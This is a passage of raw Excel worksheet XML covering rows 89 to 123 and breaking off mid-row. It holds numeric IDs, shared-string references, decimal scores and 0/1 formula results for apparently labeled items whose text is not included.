      </c>
      <c r="D89" s="62" t="s">
        <v>430</v>
      </c>
      <c r="E89" s="62" t="s">
        <v>431</v>
      </c>
      <c r="F89" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G89" s="62">
        <v>0.8</v>
      </c>
      <c r="H89" s="64">
        <v>0.0</v>
      </c>
      <c r="I89" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J89" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K89" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L89" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O89" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="62">
        <v>12992.0</v>
      </c>
      <c r="B90" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C90" s="63" t="s">
        <v>432</v>
      </c>
      <c r="D90" s="62" t="s">
        <v>433</v>
      </c>
      <c r="E90" s="62" t="s">
        <v>434</v>
      </c>
      <c r="F90" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G90" s="62">
        <v>0.9</v>
      </c>
      <c r="H90" s="64">
        <v>1.0</v>
      </c>
      <c r="I90" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J90" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K90" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L90" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O90" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="62">
        <v>13120.0</v>
      </c>
      <c r="B91" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C91" s="63" t="s">
        <v>435</v>
      </c>
      <c r="D91" s="62" t="s">
        <v>436</v>
      </c>
      <c r="E91" s="62" t="s">
        <v>437</v>
      </c>
      <c r="F91" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G91" s="62">
        <v>0.9</v>
      </c>
      <c r="H91" s="64">
        <v>1.0</v>
      </c>
      <c r="I91" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J91" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K91" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L91" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O91" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="62">
        <v>13429.0</v>
      </c>
      <c r="B92" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C92" s="63" t="s">
        <v>438</v>
      </c>
      <c r="D92" s="62" t="s">
        <v>439</v>
      </c>
      <c r="E92" s="62" t="s">
        <v>440</v>
      </c>
      <c r="F92" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G92" s="62">
        <v>0.9</v>
      </c>
      <c r="H92" s="64">
        <v>1.0</v>
      </c>
      <c r="I92" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J92" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K92" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L92" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O92" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="62">
        <v>13439.0</v>
      </c>
      <c r="B93" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C93" s="63" t="s">
        <v>441</v>
      </c>
      <c r="D93" s="62" t="s">
        <v>442</v>
      </c>
      <c r="E93" s="62" t="s">
        <v>443</v>
      </c>
      <c r="F93" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G93" s="62">
        <v>0.9</v>
      </c>
      <c r="H93" s="64">
        <v>1.0</v>
      </c>
      <c r="I93" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J93" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K93" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L93" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O93" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="62">
        <v>13597.0</v>
      </c>
      <c r="B94" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C94" s="63" t="s">
        <v>444</v>
      </c>
      <c r="D94" s="62" t="s">
        <v>445</v>
      </c>
      <c r="E94" s="62" t="s">
        <v>446</v>
      </c>
      <c r="F94" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G94" s="62">
        <v>0.9</v>
      </c>
      <c r="H94" s="64">
        <v>1.0</v>
      </c>
      <c r="I94" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J94" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K94" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L94" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O94" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="62">
        <v>5.0</v>
      </c>
      <c r="B95" s="62" t="s">
        <v>447</v>
      </c>
      <c r="C95" s="63" t="s">
        <v>448</v>
      </c>
      <c r="D95" s="62" t="s">
        <v>449</v>
      </c>
      <c r="E95" s="62" t="s">
        <v>450</v>
      </c>
      <c r="F95" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G95" s="62">
        <v>0.9</v>
      </c>
      <c r="H95" s="64">
        <v>1.0</v>
      </c>
      <c r="I95" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J95" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K95" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L95" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O95" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="62">
        <v>3468.0</v>
      </c>
      <c r="B96" s="62" t="s">
        <v>15</v>
      </c>
      <c r="C96" s="63" t="s">
        <v>451</v>
      </c>
      <c r="D96" s="62" t="s">
        <v>452</v>
      </c>
      <c r="E96" s="62" t="s">
        <v>453</v>
      </c>
      <c r="F96" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G96" s="62">
        <v>0.95</v>
      </c>
      <c r="H96" s="64">
        <v>1.0</v>
      </c>
      <c r="I96" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J96" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K96" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L96" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O96" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="62">
        <v>5347.0</v>
      </c>
      <c r="B97" s="62" t="s">
        <v>15</v>
      </c>
      <c r="C97" s="63" t="s">
        <v>454</v>
      </c>
      <c r="D97" s="62" t="s">
        <v>455</v>
      </c>
      <c r="E97" s="62" t="s">
        <v>456</v>
      </c>
      <c r="F97" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G97" s="62">
        <v>0.85</v>
      </c>
      <c r="H97" s="64">
        <v>1.0</v>
      </c>
      <c r="I97" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J97" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K97" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L97" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O97" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="62">
        <v>6843.0</v>
      </c>
      <c r="B98" s="62" t="s">
        <v>15</v>
      </c>
      <c r="C98" s="63" t="s">
        <v>457</v>
      </c>
      <c r="D98" s="62" t="s">
        <v>458</v>
      </c>
      <c r="E98" s="62" t="s">
        <v>459</v>
      </c>
      <c r="F98" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G98" s="62">
        <v>0.9</v>
      </c>
      <c r="H98" s="64">
        <v>1.0</v>
      </c>
      <c r="I98" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J98" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K98" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L98" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O98" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="62">
        <v>7910.0</v>
      </c>
      <c r="B99" s="62" t="s">
        <v>15</v>
      </c>
      <c r="C99" s="63" t="s">
        <v>460</v>
      </c>
      <c r="D99" s="62" t="s">
        <v>461</v>
      </c>
      <c r="E99" s="62" t="s">
        <v>462</v>
      </c>
      <c r="F99" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G99" s="62">
        <v>0.9</v>
      </c>
      <c r="H99" s="64">
        <v>1.0</v>
      </c>
      <c r="I99" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J99" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K99" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L99" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O99" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="62">
        <v>33.0</v>
      </c>
      <c r="B100" s="62" t="s">
        <v>18</v>
      </c>
      <c r="C100" s="63" t="s">
        <v>463</v>
      </c>
      <c r="D100" s="62" t="s">
        <v>464</v>
      </c>
      <c r="E100" s="62" t="s">
        <v>465</v>
      </c>
      <c r="F100" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G100" s="62">
        <v>0.9</v>
      </c>
      <c r="H100" s="64">
        <v>1.0</v>
      </c>
      <c r="I100" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J100" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K100" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L100" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O100" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="62">
        <v>55.0</v>
      </c>
      <c r="B101" s="62" t="s">
        <v>18</v>
      </c>
      <c r="C101" s="63" t="s">
        <v>466</v>
      </c>
      <c r="D101" s="62" t="s">
        <v>467</v>
      </c>
      <c r="E101" s="62" t="s">
        <v>468</v>
      </c>
      <c r="F101" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G101" s="62">
        <v>0.85</v>
      </c>
      <c r="H101" s="64">
        <v>1.0</v>
      </c>
      <c r="I101" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J101" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K101" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L101" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O101" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="62">
        <v>37.0</v>
      </c>
      <c r="B102" s="62" t="s">
        <v>20</v>
      </c>
      <c r="C102" s="63" t="s">
        <v>469</v>
      </c>
      <c r="D102" s="62" t="s">
        <v>470</v>
      </c>
      <c r="E102" s="62" t="s">
        <v>471</v>
      </c>
      <c r="F102" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G102" s="62">
        <v>0.9</v>
      </c>
      <c r="H102" s="64">
        <v>1.0</v>
      </c>
      <c r="I102" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J102" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K102" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L102" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O102" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="62">
        <v>52.0</v>
      </c>
      <c r="B103" s="62" t="s">
        <v>20</v>
      </c>
      <c r="C103" s="63" t="s">
        <v>472</v>
      </c>
      <c r="D103" s="62" t="s">
        <v>473</v>
      </c>
      <c r="E103" s="62" t="s">
        <v>474</v>
      </c>
      <c r="F103" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G103" s="62">
        <v>0.9</v>
      </c>
      <c r="H103" s="64">
        <v>0.0</v>
      </c>
      <c r="I103" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J103" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K103" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L103" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O103" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="62">
        <v>65.0</v>
      </c>
      <c r="B104" s="62" t="s">
        <v>20</v>
      </c>
      <c r="C104" s="63" t="s">
        <v>475</v>
      </c>
      <c r="D104" s="62" t="s">
        <v>476</v>
      </c>
      <c r="E104" s="62" t="s">
        <v>477</v>
      </c>
      <c r="F104" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G104" s="62">
        <v>0.85</v>
      </c>
      <c r="H104" s="64">
        <v>0.0</v>
      </c>
      <c r="I104" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J104" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K104" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L104" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O104" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="62">
        <v>658.0</v>
      </c>
      <c r="B105" s="62" t="s">
        <v>20</v>
      </c>
      <c r="C105" s="63" t="s">
        <v>478</v>
      </c>
      <c r="D105" s="62" t="s">
        <v>479</v>
      </c>
      <c r="E105" s="62" t="s">
        <v>480</v>
      </c>
      <c r="F105" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G105" s="62">
        <v>0.9</v>
      </c>
      <c r="H105" s="64">
        <v>1.0</v>
      </c>
      <c r="I105" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J105" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K105" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L105" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O105" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="62">
        <v>5.0</v>
      </c>
      <c r="B106" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C106" s="63" t="s">
        <v>481</v>
      </c>
      <c r="D106" s="62" t="s">
        <v>482</v>
      </c>
      <c r="E106" s="62" t="s">
        <v>483</v>
      </c>
      <c r="F106" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G106" s="62">
        <v>0.9</v>
      </c>
      <c r="H106" s="64">
        <v>1.0</v>
      </c>
      <c r="I106" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J106" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K106" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L106" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O106" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="62">
        <v>42.0</v>
      </c>
      <c r="B107" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C107" s="63" t="s">
        <v>484</v>
      </c>
      <c r="D107" s="62" t="s">
        <v>485</v>
      </c>
      <c r="E107" s="62" t="s">
        <v>486</v>
      </c>
      <c r="F107" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G107" s="62">
        <v>0.9</v>
      </c>
      <c r="H107" s="64">
        <v>1.0</v>
      </c>
      <c r="I107" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J107" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K107" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L107" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O107" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="62">
        <v>120.0</v>
      </c>
      <c r="B108" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C108" s="63" t="s">
        <v>487</v>
      </c>
      <c r="D108" s="62" t="s">
        <v>488</v>
      </c>
      <c r="E108" s="62" t="s">
        <v>489</v>
      </c>
      <c r="F108" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G108" s="62">
        <v>0.85</v>
      </c>
      <c r="H108" s="64">
        <v>1.0</v>
      </c>
      <c r="I108" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J108" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K108" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L108" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O108" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="62">
        <v>190.0</v>
      </c>
      <c r="B109" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C109" s="63" t="s">
        <v>490</v>
      </c>
      <c r="D109" s="62" t="s">
        <v>491</v>
      </c>
      <c r="E109" s="62" t="s">
        <v>492</v>
      </c>
      <c r="F109" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G109" s="62">
        <v>0.9</v>
      </c>
      <c r="H109" s="64">
        <v>1.0</v>
      </c>
      <c r="I109" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J109" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K109" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L109" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O109" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="62">
        <v>323.0</v>
      </c>
      <c r="B110" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C110" s="63" t="s">
        <v>493</v>
      </c>
      <c r="D110" s="66" t="s">
        <v>494</v>
      </c>
      <c r="E110" s="62" t="s">
        <v>495</v>
      </c>
      <c r="F110" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G110" s="62">
        <v>0.9</v>
      </c>
      <c r="H110" s="64">
        <v>1.0</v>
      </c>
      <c r="I110" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J110" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K110" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L110" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O110" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="62">
        <v>327.0</v>
      </c>
      <c r="B111" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C111" s="63" t="s">
        <v>496</v>
      </c>
      <c r="D111" s="62" t="s">
        <v>497</v>
      </c>
      <c r="E111" s="62" t="s">
        <v>498</v>
      </c>
      <c r="F111" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G111" s="62">
        <v>0.95</v>
      </c>
      <c r="H111" s="64">
        <v>1.0</v>
      </c>
      <c r="I111" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J111" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K111" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L111" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O111" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="62">
        <v>374.0</v>
      </c>
      <c r="B112" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C112" s="63" t="s">
        <v>499</v>
      </c>
      <c r="D112" s="62" t="s">
        <v>500</v>
      </c>
      <c r="E112" s="62" t="s">
        <v>501</v>
      </c>
      <c r="F112" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G112" s="62">
        <v>0.9</v>
      </c>
      <c r="H112" s="64">
        <v>1.0</v>
      </c>
      <c r="I112" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J112" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K112" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L112" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O112" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="62">
        <v>413.0</v>
      </c>
      <c r="B113" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C113" s="63" t="s">
        <v>502</v>
      </c>
      <c r="D113" s="62" t="s">
        <v>503</v>
      </c>
      <c r="E113" s="62" t="s">
        <v>504</v>
      </c>
      <c r="F113" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G113" s="62">
        <v>0.95</v>
      </c>
      <c r="H113" s="64">
        <v>1.0</v>
      </c>
      <c r="I113" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J113" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K113" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L113" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O113" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="62">
        <v>417.0</v>
      </c>
      <c r="B114" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C114" s="63" t="s">
        <v>505</v>
      </c>
      <c r="D114" s="62" t="s">
        <v>506</v>
      </c>
      <c r="E114" s="62" t="s">
        <v>507</v>
      </c>
      <c r="F114" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G114" s="62">
        <v>0.9</v>
      </c>
      <c r="H114" s="64">
        <v>1.0</v>
      </c>
      <c r="I114" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J114" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K114" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L114" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O114" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="62">
        <v>430.0</v>
      </c>
      <c r="B115" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C115" s="63" t="s">
        <v>508</v>
      </c>
      <c r="D115" s="62" t="s">
        <v>509</v>
      </c>
      <c r="E115" s="62" t="s">
        <v>510</v>
      </c>
      <c r="F115" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G115" s="62">
        <v>0.9</v>
      </c>
      <c r="H115" s="64">
        <v>1.0</v>
      </c>
      <c r="I115" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J115" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K115" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L115" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O115" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="62">
        <v>795.0</v>
      </c>
      <c r="B116" s="62" t="s">
        <v>22</v>
      </c>
      <c r="C116" s="63" t="s">
        <v>511</v>
      </c>
      <c r="D116" s="62" t="s">
        <v>512</v>
      </c>
      <c r="E116" s="62" t="s">
        <v>513</v>
      </c>
      <c r="F116" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G116" s="62">
        <v>0.85</v>
      </c>
      <c r="H116" s="64">
        <v>0.0</v>
      </c>
      <c r="I116" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J116" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K116" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L116" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O116" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="62">
        <v>23179.0</v>
      </c>
      <c r="B117" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C117" s="63" t="s">
        <v>514</v>
      </c>
      <c r="D117" s="62" t="s">
        <v>515</v>
      </c>
      <c r="E117" s="62" t="s">
        <v>516</v>
      </c>
      <c r="F117" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G117" s="62">
        <v>0.85</v>
      </c>
      <c r="H117" s="64">
        <v>1.0</v>
      </c>
      <c r="I117" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J117" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K117" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L117" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O117" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="62">
        <v>23248.0</v>
      </c>
      <c r="B118" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C118" s="63" t="s">
        <v>517</v>
      </c>
      <c r="D118" s="62" t="s">
        <v>518</v>
      </c>
      <c r="E118" s="62" t="s">
        <v>519</v>
      </c>
      <c r="F118" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G118" s="62">
        <v>0.9</v>
      </c>
      <c r="H118" s="64">
        <v>0.0</v>
      </c>
      <c r="I118" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J118" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K118" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L118" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O118" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="62">
        <v>23345.0</v>
      </c>
      <c r="B119" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C119" s="63" t="s">
        <v>520</v>
      </c>
      <c r="D119" s="62" t="s">
        <v>521</v>
      </c>
      <c r="E119" s="62" t="s">
        <v>522</v>
      </c>
      <c r="F119" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G119" s="62">
        <v>0.95</v>
      </c>
      <c r="H119" s="64">
        <v>1.0</v>
      </c>
      <c r="I119" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J119" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K119" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L119" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O119" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="62">
        <v>23415.0</v>
      </c>
      <c r="B120" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C120" s="63" t="s">
        <v>523</v>
      </c>
      <c r="D120" s="62" t="s">
        <v>524</v>
      </c>
      <c r="E120" s="62" t="s">
        <v>525</v>
      </c>
      <c r="F120" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G120" s="62">
        <v>0.85</v>
      </c>
      <c r="H120" s="64">
        <v>1.0</v>
      </c>
      <c r="I120" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J120" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K120" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L120" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O120" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="62">
        <v>23790.0</v>
      </c>
      <c r="B121" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C121" s="63" t="s">
        <v>526</v>
      </c>
      <c r="D121" s="62" t="s">
        <v>527</v>
      </c>
      <c r="E121" s="62" t="s">
        <v>528</v>
      </c>
      <c r="F121" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G121" s="62">
        <v>0.95</v>
      </c>
      <c r="H121" s="64">
        <v>1.0</v>
      </c>
      <c r="I121" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J121" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K121" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L121" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O121" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="62">
        <v>24661.0</v>
      </c>
      <c r="B122" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C122" s="63" t="s">
        <v>529</v>
      </c>
      <c r="D122" s="62" t="s">
        <v>530</v>
      </c>
      <c r="E122" s="62" t="s">
        <v>531</v>
      </c>
      <c r="F122" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G122" s="62">
        <v>0.9</v>
      </c>
      <c r="H122" s="64">
        <v>1.0</v>
      </c>
      <c r="I122" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J122" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K122" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L122" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O122" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="62">
        <v>24780.0</v>
      </c>
      <c r="B123" s="62" t="s">
        <v>24</v>
      </c>
